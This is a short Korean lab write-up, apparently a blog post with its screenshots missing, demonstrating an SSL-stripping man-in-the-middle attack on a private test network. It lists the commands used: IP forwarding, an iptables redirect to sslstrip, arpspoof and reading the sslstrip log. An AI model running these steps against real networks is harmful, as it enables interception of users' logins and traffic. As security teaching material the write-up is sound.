SSL Strip

SSL Strip

 

MitM(Man in the Middle)의 공격 형태중 하나로 클라이언트와 서버간의 SSL 통신을 공격자가 중간에서 무력화 시킨다. 사용자의 편의성을 이용하여 웹페이지의 첫페이지, 로그인화면만 SSL을 이용한 웹사이트가 많은데 이는 위험을 가중시키는 일이다.

 

 

 

SSL Strip

<Attacker(Kali), 192.168.21.133>

<Victim(WindowsXP), 192.168.21.134>

<Gateway, 192.168.21.2>

 

 ["echo 1 > /proc/sys/net/ipv4/ip_forward" ip포워드 설정]

 ["iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000" 외부 공인ip에서 80포트로 들어오는 것을 ssl strip 툴의 1000번 포트로 연결하여 거쳐갈 수 있게 함.]

["sslstrip -p -l 1000" ssl strip 수행] 

 

 

 

["arpspoof" 를 이용해 클라이언트, 서버 중간에서 패킷 캡쳐] 

 

 

 [victim의 라우팅 테이블]

 

 

[https가 http로 바뀐 모습] 

 

 

["tail -f sslstrip.log" sslstrip의 로그 확인]

[http상태로 암호화가 적용되지 않은 모습]